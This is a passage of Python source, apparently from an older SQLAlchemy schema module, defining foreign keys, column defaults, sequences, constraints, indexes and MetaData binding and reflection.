(schema, tname, colname) = (None, None, None)
if (len(m) == 1):
tname = m.pop()
else:
colname = m.pop()
tname = m.pop()
if (len(m) > 0):
schema = '.'.join(m)
if _get_table_key(tname, schema) not in parenttable.metadata:
raise exc.NoReferencedTableError(
"Foreign key associated with column '%s' could not find "
"table '%s' with which to generate a "
"foreign key to target column '%s'" % (self.parent, tname, colname),
tname)
table = Table(tname, parenttable.metadata,
mustexist=True, schema=schema)
_column = None
if colname is None:
# colname is None in the case that ForeignKey argument
# was specified as table name only, in which case we
# match the column name to the same column on the
# parent.
key = self.parent
_column = table.c.get(self.parent.key, None)
elif self.link_to_name:
key = colname
for c in table.c:
if c.name == colname:
_column = c
else:
key = colname
_column = table.c.get(colname, None)
if _column is None:
raise exc.NoReferencedColumnError(
"Could not create ForeignKey '%s' on table '%s': "
"table '%s' has no column named '%s'" % (
self._colspec, parenttable.name, table.name, key),
table.name, key)
elif hasattr(self._colspec, '__clause_element__'):
_column = self._colspec.__clause_element__()
else:
_column = self._colspec
# propagate TypeEngine to parent if it didn't have one
if isinstance(self.parent.type, sqltypes.NullType):
self.parent.type = _column.type
return _column
def _set_parent(self, column):
if hasattr(self, 'parent'):
if self.parent is column:
return
raise exc.InvalidRequestError(
"This ForeignKey already has a parent!")
self.parent = column
self.parent.foreign_keys.add(self)
self.parent._on_table_attach(self._set_table)
def _set_table(self, column, table):
# standalone ForeignKey - create ForeignKeyConstraint
# on the hosting Table when attached to the Table.
if self.constraint is None and isinstance(table, Table):
self.constraint = ForeignKeyConstraint(
[], [], use_alter=self.use_alter, name=self.name,
onupdate=self.onupdate, ondelete=self.ondelete,
deferrable=self.deferrable, initially=self.initially,
)
self.constraint._elements[self.parent] = self
self.constraint._set_parent_with_dispatch(table)
table.foreign_keys.add(self)
class _NotAColumnExpr(object):
def _not_a_column_expr(self):
raise exc.InvalidRequestError(
"This %s cannot be used directly "
"as a column expression." % self.__class__.__name__)
__clause_element__ = self_group = lambda self: self._not_a_column_expr()
_from_objects = property(lambda self: self._not_a_column_expr())
class DefaultGenerator(_NotAColumnExpr, SchemaItem):
"""Base class for column *default* values."""
__visit_name__ = 'default_generator'
is_sequence = False
is_server_default = False
column = None
def __init__(self, for_update=False):
self.for_update = for_update
def _set_parent(self, column):
self.column = column
if self.for_update:
self.column.onupdate = self
else:
self.column.default = self
def execute(self, bind=None, **kwargs):
if bind is None:
bind = _bind_or_error(self)
return bind._execute_default(self, **kwargs)
@property
def bind(self):
"""Return the connectable associated with this default."""
if getattr(self, 'column', None) is not None:
return self.column.table.bind
else:
return None
def __repr__(self):
return "DefaultGenerator()"
class ColumnDefault(DefaultGenerator):
"""A plain default value on a column.
This could correspond to a constant, a callable function,
or a SQL clause.
:class:`.ColumnDefault` is generated automatically
whenever the ``default``, ``onupdate`` arguments of
:class:`.Column` are used. A :class:`.ColumnDefault`
can be passed positionally as well.
For example, the following::
Column('foo', Integer, default=50)
Is equivalent to::
Column('foo', Integer, ColumnDefault(50))
"""
def __init__(self, arg, **kwargs):
super(ColumnDefault, self).__init__(**kwargs)
if isinstance(arg, FetchedValue):
raise exc.ArgumentError(
"ColumnDefault may not be a server-side default type.")
if util.callable(arg):
arg = self._maybe_wrap_callable(arg)
self.arg = arg
@util.memoized_property
def is_callable(self):
return util.callable(self.arg)
@util.memoized_property
def is_clause_element(self):
return isinstance(self.arg, expression.ClauseElement)
@util.memoized_property
def is_scalar(self):
return not self.is_callable and \
not self.is_clause_element and \
not self.is_sequence
def _maybe_wrap_callable(self, fn):
"""Backward compat: Wrap callables that don't accept a context."""
if inspect.isfunction(fn):
inspectable = fn
elif inspect.isclass(fn):
inspectable = fn.__init__
elif hasattr(fn, '__call__'):
inspectable = fn.__call__
else:
# probably not inspectable, try anyway.
inspectable = fn
try:
argspec = inspect.getargspec(inspectable)
except TypeError:
return lambda ctx: fn()
positionals = len(argspec[0])
# Py3K compat - no unbound methods
if inspect.ismethod(inspectable) or inspect.isclass(fn):
positionals -= 1
if positionals == 0:
return lambda ctx: fn()
defaulted = argspec[3] is not None and len(argspec[3]) or 0
if positionals - defaulted > 1:
raise exc.ArgumentError(
"ColumnDefault Python function takes zero or one "
"positional arguments")
return fn
def _visit_name(self):
if self.for_update:
return "column_onupdate"
else:
return "column_default"
__visit_name__ = property(_visit_name)
def __repr__(self):
return "ColumnDefault(%r)" % self.arg
class Sequence(DefaultGenerator):
"""Represents a named database sequence.
The :class:`.Sequence` object represents the name and configurational
parameters of a database sequence. It also represents
a construct that can be "executed" by a SQLAlchemy :class:`.Engine`
or :class:`.Connection`, rendering the appropriate "next value" function
for the target database and returning a result.
The :class:`.Sequence` is typically associated with a primary key column::
some_table = Table('some_table', metadata,
Column('id', Integer, Sequence('some_table_seq'), primary_key=True)
)
When CREATE TABLE is emitted for the above :class:`.Table`, if the
target platform supports sequences, a CREATE SEQUENCE statement will
be emitted as well. For platforms that don't support sequences,
the :class:`.Sequence` construct is ignored.
See also: :class:`.CreateSequence` :class:`.DropSequence`
"""
__visit_name__ = 'sequence'
is_sequence = True
def __init__(self, name, start=None, increment=None, schema=None,
optional=False, quote=None, metadata=None,
for_update=False):
"""Construct a :class:`.Sequence` object.
:param name: The name of the sequence.
:param start: the starting index of the sequence. This value is
used when the CREATE SEQUENCE command is emitted to the database
as the value of the "START WITH" clause. If ``None``, the
clause is omitted, which on most platforms indicates a starting
value of 1.
:param increment: the increment value of the sequence. This
value is used when the CREATE SEQUENCE command is emitted to
the database as the value of the "INCREMENT BY" clause. If ``None``,
the clause is omitted, which on most platforms indicates an
increment of 1.
:param schema: Optional schema name for the sequence, if located
in a schema other than the default.
:param optional: boolean value, when ``True``, indicates that this
:class:`.Sequence` object only needs to be explicitly generated
on backends that don't provide another way to generate primary
key identifiers. Currently, it essentially means, "don't create
this sequence on the Postgresql backend, where the SERIAL keyword
creates a sequence for us automatically".
:param quote: boolean value, when ``True`` or ``False``, explicitly
forces quoting of the schema name on or off. When left at its
default of ``None``, normal quoting rules based on casing and reserved
words take place.
:param metadata: optional :class:`.MetaData` object which will be
associated with this :class:`.Sequence`. A :class:`.Sequence`
that is associated with a :class:`.MetaData` gains access to the
``bind`` of that :class:`.MetaData`, meaning the :meth:`.Sequence.create`
and :meth:`.Sequence.drop` methods will make usage of that engine
automatically. Additionally, the appropriate CREATE SEQUENCE/
DROP SEQUENCE DDL commands will be emitted corresponding to this
:class:`.Sequence` when :meth:`.MetaData.create_all` and
:meth:`.MetaData.drop_all` are invoked (new in 0.7).
Note that when a :class:`.Sequence` is applied to a :class:`.Column`,
the :class:`.Sequence` is automatically associated with the
:class:`.MetaData` object of that column's parent :class:`.Table`,
when that association is made. The :class:`.Sequence` will then
be subject to automatic CREATE SEQUENCE/DROP SEQUENCE corresponding
to when the :class:`.Table` object itself is created or dropped,
rather than that of the :class:`.MetaData` object overall.
:param for_update: Indicates this :class:`.Sequence`, when associated
with a :class:`.Column`, should be invoked for UPDATE statements
on that column's table, rather than for INSERT statements, when
no value is otherwise present for that column in the statement.
"""
super(Sequence, self).__init__(for_update=for_update)
self.name = name
self.start = start
self.increment = increment
self.optional = optional
self.quote = quote
self.schema = schema
self.metadata = metadata
self._key = _get_table_key(name, schema)
if metadata:
self._set_metadata(metadata)
@util.memoized_property
def is_callable(self):
return False
@util.memoized_property
def is_clause_element(self):
return False
def next_value(self):
"""Return a :class:`.next_value` function element
which will render the appropriate increment function
for this :class:`.Sequence` within any SQL expression.
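For example, a minimal sketch (``seq`` is assumed to be this
:class:`.Sequence` and ``t`` a :class:`.Table` with an ``id`` column)::
    t.insert().values(id=seq.next_value())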
"""
return expression.func.next_value(self, bind=self.bind)
def __repr__(self):
return "Sequence(%s)" % ', '.join(
[repr(self.name)] +
["%s=%s" % (k, repr(getattr(self, k)))
for k in ['start', 'increment', 'optional']])
def _set_parent(self, column):
super(Sequence, self)._set_parent(column)
column._on_table_attach(self._set_table)
def _set_table(self, column, table):
self._set_metadata(table.metadata)
def _set_metadata(self, metadata):
self.metadata = metadata
self.metadata._sequences[self._key] = self
@property
def bind(self):
if self.metadata:
return self.metadata.bind
else:
return None
def create(self, bind=None, checkfirst=True):
"""Creates this sequence in the database."""
if bind is None:
bind = _bind_or_error(self)
bind._run_visitor(ddl.SchemaGenerator,
self,
checkfirst=checkfirst)
def drop(self, bind=None, checkfirst=True):
"""Drops this sequence from the database."""
if bind is None:
bind = _bind_or_error(self)
bind._run_visitor(ddl.SchemaDropper,
self,
checkfirst=checkfirst)
def _not_a_column_expr(self):
raise exc.InvalidRequestError(
"This %s cannot be used directly "
"as a column expression. Use func.next_value(sequence) "
"to produce a 'next value' function that's usable "
"as a column element."
% self.__class__.__name__)
class FetchedValue(_NotAColumnExpr, events.SchemaEventTarget):
"""A marker for a transparent database-side default.
Use :class:`.FetchedValue` when the database is configured
to provide some automatic default for a column.
E.g.::
Column('foo', Integer, FetchedValue())
Would indicate that some trigger or default generator
will create a new value for the ``foo`` column during an
INSERT.
"""
is_server_default = True
reflected = False
has_argument = False
def __init__(self, for_update=False):
self.for_update = for_update
def _set_parent(self, column):
self.column = column
if self.for_update:
self.column.server_onupdate = self
else:
self.column.server_default = self
def __repr__(self):
return 'FetchedValue(for_update=%r)' % self.for_update
class DefaultClause(FetchedValue):
"""A DDL-specified DEFAULT column value.
:class:`.DefaultClause` is a :class:`.FetchedValue`
that also generates a "DEFAULT" clause when
"CREATE TABLE" is emitted.
:class:`.DefaultClause` is generated automatically
whenever the ``server_default``, ``server_onupdate`` arguments of
:class:`.Column` are used. A :class:`.DefaultClause`
can be passed positionally as well.
For example, the following::
Column('foo', Integer, server_default="50")
Is equivalent to::
Column('foo', Integer, DefaultClause("50"))
"""
has_argument = True
def __init__(self, arg, for_update=False, _reflected=False):
util.assert_arg_type(arg, (basestring,
expression.ClauseElement,
expression._TextClause), 'arg')
super(DefaultClause, self).__init__(for_update)
self.arg = arg
self.reflected = _reflected
def __repr__(self):
return "DefaultClause(%r, for_update=%r)" % \
(self.arg, self.for_update)
class PassiveDefault(DefaultClause):
"""A DDL-specified DEFAULT column value.
.. deprecated:: 0.6 :class:`.PassiveDefault` is deprecated.
Use :class:`.DefaultClause`.
"""
@util.deprecated("0.6",
":class:`.PassiveDefault` is deprecated. "
"Use :class:`.DefaultClause`.",
False)
def __init__(self, *arg, **kw):
DefaultClause.__init__(self, *arg, **kw)
class Constraint(SchemaItem):
"""A table-level SQL constraint."""
__visit_name__ = 'constraint'
def __init__(self, name=None, deferrable=None, initially=None,
_create_rule=None):
"""Create a SQL constraint.
:param name:
Optional, the in-database name of this ``Constraint``.
:param deferrable:
Optional bool. If set, emit DEFERRABLE or NOT DEFERRABLE when
issuing DDL for this constraint.
:param initially:
Optional string. If set, emit INITIALLY <value> when issuing DDL
for this constraint.
:param _create_rule:
a callable which is passed the DDLCompiler object during
compilation. Returns True or False to signal inline generation of
this Constraint.
The AddConstraint and DropConstraint DDL constructs provide
DDLElement's more comprehensive "conditional DDL" approach that is
passed a database connection when DDL is being issued. _create_rule
is instead called during any CREATE TABLE compilation, where there
may not be any transaction/connection in progress. However, it
allows conditional compilation of the constraint even for backends
which do not support addition of constraints through ALTER TABLE,
which currently includes SQLite.
_create_rule is used by some types to create constraints.
Currently, its call signature is subject to change at any time.
"""
self.name = name
self.deferrable = deferrable
self.initially = initially
self._create_rule = _create_rule
util.set_creation_order(self)
@property
def table(self):
try:
if isinstance(self.parent, Table):
return self.parent
except AttributeError:
pass
raise exc.InvalidRequestError(
"This constraint is not bound to a table. Did you "
"mean to call table.append_constraint(constraint)?")
def _set_parent(self, parent):
self.parent = parent
parent.constraints.add(self)
def copy(self, **kw):
raise NotImplementedError()
class ColumnCollectionMixin(object):
def __init__(self, *columns):
self.columns = expression.ColumnCollection()
self._pending_colargs = [_to_schema_column_or_string(c)
for c in columns]
if self._pending_colargs and \
isinstance(self._pending_colargs[0], Column) and \
self._pending_colargs[0].table is not None:
self._set_parent_with_dispatch(self._pending_colargs[0].table)
def _set_parent(self, table):
for col in self._pending_colargs:
if isinstance(col, basestring):
col = table.c[col]
self.columns.add(col)
class ColumnCollectionConstraint(ColumnCollectionMixin, Constraint):
"""A constraint that proxies a ColumnCollection."""
def __init__(self, *columns, **kw):
"""
:param \*columns:
A sequence of column names or Column objects.
:param name:
Optional, the in-database name of this constraint.
:param deferrable:
Optional bool. If set, emit DEFERRABLE or NOT DEFERRABLE when
issuing DDL for this constraint.
:param initially:
Optional string. If set, emit INITIALLY <value> when issuing DDL
for this constraint.
"""
ColumnCollectionMixin.__init__(self, *columns)
Constraint.__init__(self, **kw)
def _set_parent(self, table):
ColumnCollectionMixin._set_parent(self, table)
Constraint._set_parent(self, table)
def __contains__(self, x):
return x in self.columns
def copy(self, **kw):
c = self.__class__(name=self.name, deferrable=self.deferrable,
initially=self.initially, *self.columns.keys())
c.dispatch._update(self.dispatch)
return c
def contains_column(self, col):
return self.columns.contains_column(col)
def __iter__(self):
# inlining of
# return iter(self.columns)
# ColumnCollection->OrderedProperties->OrderedDict
ordered_dict = self.columns._data
return (ordered_dict[key] for key in ordered_dict._list)
def __len__(self):
return len(self.columns._data)
class CheckConstraint(Constraint):
"""A table- or column-level CHECK constraint.
Can be included in the definition of a Table or Column.
"""
def __init__(self, sqltext, name=None, deferrable=None,
initially=None, table=None, _create_rule=None):
"""Construct a CHECK constraint.
:param sqltext:
A string containing the constraint definition, which will be used
verbatim, or a SQL expression construct.
:param name:
Optional, the in-database name of the constraint.
:param deferrable:
Optional bool. If set, emit DEFERRABLE or NOT DEFERRABLE when
issuing DDL for this constraint.
:param initially:
Optional string. If set, emit INITIALLY <value> when issuing DDL
for this constraint.
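For example, a minimal sketch of a table-level CHECK constraint
(table and column names are illustrative)::
    Table('prices', metadata,
        Column('price', Numeric(10, 2)),
        CheckConstraint('price > 0', name='ck_price_positive')
    )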
"""
super(CheckConstraint, self).\
__init__(name, deferrable, initially, _create_rule)
self.sqltext = expression._literal_as_text(sqltext)
if table is not None:
self._set_parent_with_dispatch(table)
def __visit_name__(self):
if isinstance(self.parent, Table):
return "check_constraint"
else:
return "column_check_constraint"
__visit_name__ = property(__visit_name__)
def copy(self, **kw):
c = CheckConstraint(self.sqltext,
name=self.name,
initially=self.initially,
deferrable=self.deferrable,
_create_rule=self._create_rule)
c.dispatch._update(self.dispatch)
return c
class ForeignKeyConstraint(Constraint):
"""A table-level FOREIGN KEY constraint.
Defines a single column or composite FOREIGN KEY ... REFERENCES
constraint. For a no-frills, single column foreign key, adding a
:class:`.ForeignKey` to the definition of a :class:`.Column` is a shorthand
equivalent for an unnamed, single column :class:`.ForeignKeyConstraint`.
Examples of foreign key configuration are in :ref:`metadata_foreignkeys`.
"""
__visit_name__ = 'foreign_key_constraint'
def __init__(self, columns, refcolumns, name=None, onupdate=None,
ondelete=None, deferrable=None, initially=None, use_alter=False,
link_to_name=False, table=None):
"""Construct a composite-capable FOREIGN KEY.
:param columns: A sequence of local column names. The named columns
must be defined and present in the parent Table. The names should
match the ``key`` given to each column (defaults to the name) unless
``link_to_name`` is True.
:param refcolumns: A sequence of foreign column names or Column
objects. The columns must all be located within the same Table.
:param name: Optional, the in-database name of the key.
:param onupdate: Optional string. If set, emit ON UPDATE <value> when
issuing DDL for this constraint. Typical values include CASCADE,
DELETE and RESTRICT.
:param ondelete: Optional string. If set, emit ON DELETE <value> when
issuing DDL for this constraint. Typical values include CASCADE,
DELETE and RESTRICT.
:param deferrable: Optional bool. If set, emit DEFERRABLE or NOT
DEFERRABLE when issuing DDL for this constraint.
:param initially: Optional string. If set, emit INITIALLY <value> when
issuing DDL for this constraint.
:param link_to_name: if True, the string name given in ``column`` is
the rendered name of the referenced column, not its locally assigned
``key``.
:param use_alter: If True, do not emit the DDL for this constraint as
part of the CREATE TABLE definition. Instead, generate it via an
ALTER TABLE statement issued after the full collection of tables
have been created, and drop it via an ALTER TABLE statement before
the full collection of tables are dropped. This is shorthand for the
usage of :class:`.AddConstraint` and :class:`.DropConstraint` applied
as "after-create" and "before-drop" events on the MetaData object.
This is normally used to generate/drop constraints on objects that
are mutually dependent on each other.
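For example, a sketch of two mutually-dependent tables, one of which
uses ``use_alter`` so that its constraint is emitted via ALTER TABLE
after both tables exist (names are illustrative)::
    Table('a', metadata,
        Column('id', Integer, primary_key=True),
        Column('b_id', Integer),
        ForeignKeyConstraint(['b_id'], ['b.id'],
                             use_alter=True, name='fk_a_b')
    )
    Table('b', metadata,
        Column('id', Integer, primary_key=True),
        Column('a_id', Integer, ForeignKey('a.id'))
    )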
"""
super(ForeignKeyConstraint, self).\
__init__(name, deferrable, initially)
self.onupdate = onupdate
self.ondelete = ondelete
self.link_to_name = link_to_name
if self.name is None and use_alter:
raise exc.ArgumentError("Alterable Constraint requires a name")
self.use_alter = use_alter
self._elements = util.OrderedDict()
# standalone ForeignKeyConstraint - create
# associated ForeignKey objects which will be applied to hosted
# Column objects (in col.foreign_keys), either now or when attached
# to the Table for string-specified names
for col, refcol in zip(columns, refcolumns):
self._elements[col] = ForeignKey(
refcol,
_constraint=self,
name=self.name,
onupdate=self.onupdate,
ondelete=self.ondelete,
use_alter=self.use_alter,
link_to_name=self.link_to_name
)
if table is not None:
self._set_parent_with_dispatch(table)
@property
def columns(self):
return self._elements.keys()
@property
def elements(self):
return self._elements.values()
def _set_parent(self, table):
super(ForeignKeyConstraint, self)._set_parent(table)
for col, fk in self._elements.iteritems():
# string-specified column names now get
# resolved to Column objects
if isinstance(col, basestring):
col = table.c[col]
if not hasattr(fk, 'parent') or \
fk.parent is not col:
fk._set_parent_with_dispatch(col)
if self.use_alter:
def supports_alter(ddl, event, schema_item, bind, **kw):
return table in set(kw['tables']) and \
bind.dialect.supports_alter
event.listen(table.metadata, "after_create", AddConstraint(self, on=supports_alter))
event.listen(table.metadata, "before_drop", DropConstraint(self, on=supports_alter))
def copy(self, **kw):
fkc = ForeignKeyConstraint(
[x.parent.name for x in self._elements.values()],
[x._get_colspec(**kw) for x in self._elements.values()],
name=self.name,
onupdate=self.onupdate,
ondelete=self.ondelete,
use_alter=self.use_alter,
deferrable=self.deferrable,
initially=self.initially,
link_to_name=self.link_to_name
)
fkc.dispatch._update(self.dispatch)
return fkc
class PrimaryKeyConstraint(ColumnCollectionConstraint):
"""A table-level PRIMARY KEY constraint.
Defines a single column or composite PRIMARY KEY constraint. For a
no-frills primary key, adding ``primary_key=True`` to one or more
``Column`` definitions is a shorthand equivalent for an unnamed single- or
multiple-column PrimaryKeyConstraint.
"""
__visit_name__ = 'primary_key_constraint'
def _set_parent(self, table):
super(PrimaryKeyConstraint, self)._set_parent(table)
if table.primary_key in table.constraints:
table.constraints.remove(table.primary_key)
table.primary_key = self
table.constraints.add(self)
for c in self.columns:
c.primary_key = True
def _replace(self, col):
self.columns.replace(col)
class UniqueConstraint(ColumnCollectionConstraint):
"""A table-level UNIQUE constraint.
Defines a single column or composite UNIQUE constraint. For a no-frills,
single column constraint, adding ``unique=True`` to the ``Column``
definition is a shorthand equivalent for an unnamed, single column
UniqueConstraint.
"""
__visit_name__ = 'unique_constraint'
class Index(ColumnCollectionMixin, SchemaItem):
"""A table-level INDEX.
Defines a composite (one or more column) INDEX. For a no-frills, single
column index, adding ``index=True`` to the ``Column`` definition is
a shorthand equivalent for an unnamed, single column Index.
"""
__visit_name__ = 'index'
def __init__(self, name, *columns, **kw):
"""Construct an index object.
:param name:
The name of the index
:param \*columns:
Columns to include in the index. All columns must belong to the same
table.
:param unique:
Defaults to False: create a unique index.
:param \**kw:
Other keyword arguments may be interpreted by specific dialects.
"""
self.table = None
# will call _set_parent() if table-bound column
# objects are present
ColumnCollectionMixin.__init__(self, *columns)
self.name = name
self.unique = kw.pop('unique', False)
self.kwargs = kw
def _set_parent(self, table):
ColumnCollectionMixin._set_parent(self, table)
if self.table is not None and table is not self.table:
raise exc.ArgumentError(
"Index '%s' is against table '%s', and "
"cannot be associated with table '%s'." % (
self.name,
self.table.description,
table.description
)
)
self.table = table
for c in self.columns:
if c.table != self.table:
raise exc.ArgumentError(
"Column '%s' is not part of table '%s'." %
(c, self.table.description)
)
table.indexes.add(self)
@property
def bind(self):
"""Return the connectable associated with this Index."""
return self.table.bind
def create(self, bind=None):
"""Issue a ``CREATE`` statement for this
:class:`.Index`, using the given :class:`.Connectable`
for connectivity.
See also :meth:`.MetaData.create_all`.
"""
if bind is None:
bind = _bind_or_error(self)
bind._run_visitor(ddl.SchemaGenerator, self)
return self
def drop(self, bind=None):
"""Issue a ``DROP`` statement for this
:class:`.Index`, using the given :class:`.Connectable`
for connectivity.
See also :meth:`.MetaData.drop_all`.
"""
if bind is None:
bind = _bind_or_error(self)
bind._run_visitor(ddl.SchemaDropper, self)
def __repr__(self):
return 'Index("%s", %s%s)' % (
self.name,
', '.join(repr(c) for c in self.columns),
(self.unique and ', unique=True') or '')
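# Hedged usage sketch (not from the original module): declaring a composite
# Index against an already-defined Table. The table and column names are
# hypothetical; the import is local to avoid import-time side effects.
def _example_composite_index():
    from sqlalchemy import MetaData, Table, Column, Integer, String, Index

    meta = MetaData()
    users = Table('users', meta,
                  Column('id', Integer, primary_key=True),
                  Column('last_name', String(50)),
                  Column('first_name', String(50)))
    # Equivalent in spirit to index=True on a single Column, but covering
    # two columns and carrying an explicit name; unique defaults to False.
    return Index('ix_users_name', users.c.last_name, users.c.first_name)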
class MetaData(SchemaItem):
"""A collection of Tables and their associated schema constructs.
Holds a collection of Tables and an optional binding to an ``Engine`` or
``Connection``. If bound, the :class:`~sqlalchemy.schema.Table` objects
in the collection and their columns may participate in implicit SQL
execution.
The `Table` objects themselves are stored in the `metadata.tables`
dictionary.
The ``bind`` property may be assigned to dynamically. A common pattern is
to start unbound and then bind later when an engine is available::
metadata = MetaData()
# define tables
Table('mytable', metadata, ...)
# connect to an engine later, perhaps after loading a URL from a
# configuration file
metadata.bind = an_engine
MetaData is a thread-safe object after tables have been explicitly defined
or loaded via reflection.
.. index::
single: thread safety; MetaData
"""
__visit_name__ = 'metadata'
def __init__(self, bind=None, reflect=False):
"""Create a new MetaData object.
:param bind:
An Engine or Connection to bind to. May also be a string or URL
instance, these are passed to create_engine() and this MetaData will
be bound to the resulting engine.
:param reflect:
Optional, automatically load all tables from the bound database.
Defaults to False. ``bind`` is required when this option is set.
For finer control over loaded tables, use the ``reflect`` method of
``MetaData``.
"""
self.tables = util.immutabledict()
self._schemas = set()
self._sequences = {}
self.bind = bind
if reflect:
if not bind:
raise exc.ArgumentError(
"A bind must be supplied in conjunction "
"with reflect=True")
self.reflect()
def __repr__(self):
return 'MetaData(%r)' % self.bind
def __contains__(self, table_or_key):
if not isinstance(table_or_key, basestring):
table_or_key = table_or_key.key
return table_or_key in self.tables
def _add_table(self, name, schema, table):
key = _get_table_key(name, schema)
dict.__setitem__(self.tables, key, table)
if schema:
self._schemas.add(schema)
def _remove_table(self, name, schema):
key = _get_table_key(name, schema)
dict.pop(self.tables, key, None)
if self._schemas:
self._schemas = set([t.schema
for t in self.tables.values()
if t.schema is not None])
def __getstate__(self):
return {'tables': self.tables, 'schemas':self._schemas,
'sequences':self._sequences}
def __setstate__(self, state):
self.tables = state['tables']
self._bind = None
self._sequences = state['sequences']
self._schemas = state['schemas']
def is_bound(self):
"""True if this MetaData is bound to an Engine or Connection."""
return self._bind is not None
def bind(self):
"""An Engine or Connection to which this MetaData is bound.
This property may be assigned an ``Engine`` or ``Connection``, or
assigned a string or URL to automatically create a basic ``Engine``
for this bind with ``create_engine()``.
"""
return self._bind
def _bind_to(self, bind):
"""Bind this MetaData to an Engine, Connection, string or URL."""
if isinstance(bind, (basestring, url.URL)):
from sqlalchemy import create_engine
self._bind = create_engine(bind)
else:
self._bind = bind
bind = property(bind, _bind_to)
def clear(self):
"""Clear all Table objects from this MetaData."""
dict.clear(self.tables)
self._schemas.clear()
def remove(self, table):
"""Remove the given Table object from this MetaData."""
self._remove_table(table.name, table.schema)
@property
def sorted_tables(self):
"""Returns a list of ``Table`` objects sorted in order of
dependency.
"""
return sqlutil.sort_tables(self.tables.itervalues())
def reflect(self, bind=None, schema=None, views=False, only=None):
"""Load all available table definitions from the database.
Automatically creates ``Table`` entries in this ``MetaData`` for any
table available in the database but not yet present in the
``MetaData``. May be called multiple times to pick up tables recently
added to the database, however no special action is taken if a table
in this ``MetaData`` no longer exists in the database.
:param bind:
A :class:`~sqlalchemy.engine.base.Connectable` used to access the
database; if None, uses the existing bind on this ``MetaData``, if
any.
:param schema:
          Optional, query and reflect tables from an alternate schema.
:param views:
If True, also reflect views.
:param only:
Optional. Load only a sub-set of available named tables. May be
specified as a sequence of names or a callable.
If a sequence of names is provided, only those tables will be
reflected. An error is raised if a table is requested but not
available. Named tables already present in this ``MetaData`` are
ignored.
If a callable is provided, it will be used as a boolean predicate to
filter the list of potential table names. The callable is called
with a table name and this ``MetaData`` instance as positional
arguments and should return a true value for any table to reflect.
"""
reflect_opts = {'autoload': True}
if bind is None:
bind = _bind_or_error(self)
conn = None
else:
reflect_opts['autoload_with'] = bind
conn = bind.contextual_connect()
if schema is not None:
reflect_opts['schema'] = schema
try:
available = util.OrderedSet(bind.engine.table_names(schema,
connection=conn))
if views:
available.update(
bind.dialect.get_view_names(conn or bind, schema)
)
current = set(self.tables.iterkeys())
if only is None:
load = [name for name in available if name not in current]
elif util.callable(only):
load = [name for name in available
if name not in current and only(name, self)]
else:
missing = [name for name in only if name not in available]
if missing:
s = schema and (" schema '%s'" % schema) or ''
raise exc.InvalidRequestError(
'Could not reflect: requested table(s) not available '
'in %s%s: (%s)' %
(bind.engine.url, s, ', '.join(missing)))
load = [name for name in only if name not in current]
for name in load:
Table(name, self, **reflect_opts)
finally:
if conn is not None and \
conn is not bind:
conn.close()
def append_ddl_listener(self, event_name, listener):
"""Append a DDL event listener to this ``MetaData``.
Deprecated. See :class:`.DDLEvents`.
"""
def adapt_listener(target, connection, **kw):
listener(event, target, connection, **kw)
event.listen(self, "" + event_name.replace('-', '_'), adapt_listener)
def create_all(self, bind=None, tables=None, checkfirst=True):
"""Create all tables stored in this metadata.
Conditional by default, will not attempt to recreate tables already
present in the target database.
:param bind:
A :class:`~sqlalchemy.engine.base.Connectable` used to access the
database; if None, uses the existing bind on this ``MetaData``, if
any.
:param tables:
Optional list of ``Table`` objects, which is a subset of the total
tables in the ``MetaData`` (others are ignored).
:param checkfirst:
Defaults to True, don't issue CREATEs for tables already present
in the target database.
"""
if bind is None:
bind = _bind_or_error(self)
bind._run_visitor(ddl.SchemaGenerator,
self,
checkfirst=checkfirst,
tables=tables)
def drop_all(self, bind=None, tables=None, checkfirst=True):
"""Drop all tables stored in this metadata.
Conditional by default, will not attempt to drop tables not present in
the target database.
:param bind:
A :class:`~sqlalchemy.engine.base.Connectable` used to access the
database; if None, uses the existing bind on this ``MetaData``, if
any.
:param tables:
Optional list of ``Table`` objects, which is a subset of the
total tables in the ``MetaData`` (others are ignored).
:param checkfirst:
Defaults to True, only issue DROPs for tables confirmed to be
present in the target database.
"""
if bind is None:
bind = _bind_or_error(self)
bind._run_visitor(ddl.SchemaDropper,
self,
checkfirst=checkfirst,
tables=tables)
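# Hedged usage sketch (not from the original module): the bind-later pattern
# from the MetaData docstring, followed by create_all() and reflect(). The
# in-memory SQLite URL is only an example.
def _example_metadata_round_trip():
    from sqlalchemy import MetaData, Table, Column, Integer, create_engine

    meta = MetaData()
    Table('mytable', meta, Column('id', Integer, primary_key=True))
    meta.bind = create_engine('sqlite://')  # assign an engine after the fact
    meta.create_all()                       # emits CREATE TABLE via the bind
    meta.reflect()                          # loads any other tables present
    return meta.sorted_tables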
class ThreadLocalMetaData(MetaData):
"""A MetaData variant that presents a different ``bind`` in every thread.
Makes the ``bind`` property of the MetaData a thread-local value, allowing
this collection of tables to be bound to different ``Engine``
implementations or connections in each thread.
The ThreadLocalMetaData starts off bound to None in each thread. Binds
must be made explicitly by assigning to the ``bind`` property or using
``connect()``. You can also re-bind dynamically multiple times per
thread, just like a regular ``MetaData``.
"""
__visit_name__ = 'metadata'
def __init__(self):
"""Construct a ThreadLocalMetaData."""
self.context = util.threading.local()
self.__engines = {}
super(ThreadLocalMetaData, self).__init__()
def bind(self):
"""The bound Engine or Connection for this thread.
This property may be assigned an Engine or Connection, or assigned a
string or URL to automatically create a basic Engine for this bind
with ``create_engine()``."""
return getattr(self.context, '_engine', None)
def _bind_to(self, bind):
"""Bind to a Connectable in the caller's thread."""
if isinstance(bind, (basestring, url.URL)):
try:
self.context._engine = self.__engines[bind]
except KeyError:
from sqlalchemy import create_engine
e = create_engine(bind)
self.__engines[bind] = e
self.context._engine = e
else:
# TODO: this is squirrely. we shouldnt have to hold onto engines
# in a case like this
if bind not in self.__engines:
self.__engines[bind] = bind
self.context._engine = bind
bind = property(bind, _bind_to)
def is_bound(self):
"""True if there is a bind for this thread."""
return (hasattr(self.context, '_engine') and
self.context._engine is not None)
def dispose(self):
"""Dispose all bound engines, in all thread contexts."""
for e in self.__engines.itervalues():
if hasattr(e, 'dispose'):
e.dispose()
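# Hedged usage sketch (not from the original module): each thread assigns its
# own bind to a ThreadLocalMetaData; a string or URL is turned into an Engine
# via create_engine() and cached per URL. The URL below is only an example.
def _example_thread_local_bind():
    meta = ThreadLocalMetaData()
    meta.bind = 'sqlite://'      # this thread's engine
    assert meta.is_bound()
    meta.dispose()               # dispose engines created in any thread
    return meta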
class SchemaVisitor(visitors.ClauseVisitor):
"""Define the visiting for ``SchemaItem`` objects."""
__traverse_options__ = {'schema_visitor':True}
class DDLElement(expression.Executable, expression.ClauseElement):
"""Base class for DDL expression constructs.
This class is the base for the general purpose :class:`.DDL` class,
as well as the various create/drop clause constructs such as
